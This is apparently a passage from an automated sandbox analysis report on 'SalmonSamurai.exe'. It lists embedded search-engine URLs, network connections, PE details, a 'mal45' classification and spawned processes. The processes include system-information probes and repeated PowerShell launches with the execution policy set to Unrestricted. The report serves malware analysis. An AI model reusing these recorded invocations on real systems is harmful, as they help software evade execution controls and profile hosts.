Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sug.so.360.cn/suggest?encodein=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.search.daum.net/sushi/opensearch/pc?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.cz/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.seznam.sk/fulltext_ff?phrase=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.com/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?part=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestion.baidu.com/su?wd=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.at/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.co.uk/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.com/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.es/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.fr/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggestplugin.gmx.net/s?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suggests.go.mail.ru/chrome?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/favicon.icohttps://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://th.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/favicon.icohttps://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://tw.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE memstr_b4d6eb1a-5

System Summary

Source: C:\Users\user\Desktop\SalmonSamurai.exe File dump: SalmonSamurai.exe.0.dr 160143360
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process Stats: CPU usage > 49%
Source: libEGL.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe.0.dr Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: SalmonSamurai.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal45.winEXE@77/139@2/3
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user\AppData\Roaming\NsisExtracted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\Desktop\SalmonSamurai.exe File created: C:\Users\user\AppData\Local\Temp\nsq5816.tmp
Source: SalmonSamurai.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SalmonSamurai.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SalmonSamurai.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SalmonSamurai.exe ReversingLabs: Detection: 30%
Source: C:\Users\user\Desktop\SalmonSamurai.exe File read: C:\Users\user\Desktop\SalmonSamurai.exe
Source: unknown Process created: C:\Users\user\Desktop\SalmonSamurai.exe "C:\Users\user\Desktop\SalmonSamurai.exe"
Source: C:\Users\user\Desktop\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winhttp.dll
